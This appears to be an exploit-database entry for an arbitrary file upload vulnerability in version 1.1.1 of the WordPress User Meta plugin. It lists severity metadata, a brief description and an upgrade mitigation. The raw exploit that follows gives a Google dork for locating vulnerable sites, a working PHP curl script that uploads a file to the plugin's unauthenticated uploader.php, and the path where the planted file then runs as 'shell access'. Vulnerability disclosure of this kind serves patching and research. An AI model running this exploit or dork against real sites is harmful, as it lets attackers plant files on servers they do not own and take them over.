Wordpress User Meta Version 1.1.1 Arbitrary File Upload

vendor:

User Meta

by:

Adrien Thierry

7,5

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: User Meta

Affected Version From: 1.1.1

Affected Version To: 1.1.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:user-meta:user_meta:1.1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

WordPress User Meta Version 1.1.1 Arbitrary File Upload

An attacker can upload arbitrary files to the vulnerable Wordpress User Meta Version 1.1.1 plugin by exploiting the uploader.php file. The attacker can then access the uploaded file by accessing the filepath shown in the result of the exploit.

Mitigation:

Upgrade to the latest version of the Wordpress User Meta plugin.

Source

Exploit-DB raw data:

###########################################################
#
# Exploit Title: Wordpress User Meta Version 1.1.1 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/user-meta/framework/helper/
# Date: 11/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage:  http://user-meta.com/
# Software Link: http://downloads.wordpress.org/plugin/user-meta.1.1.1.zip
# Version: 1.1.1
#
###########################################################

Vuln page : http://mysite.com/wp-content/plugins/user-meta/framework/helper/uploader.php

exploit :

<?php
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php.jpg";
$c = curl_init("http://127.0.0.1/wp/wp-content/plugins/user-meta/framework/helper/uploader.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$u"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e; 
?>

Shell access : Shown in result of exploit
	ex : {"success":true,"fieldname":null,"filepath":"\/2012\/06\/1339356494.jpg"}
		access : http://mysite.com/wp-content/uploads/2012/06/1339356494.jpg
		
#####################################################################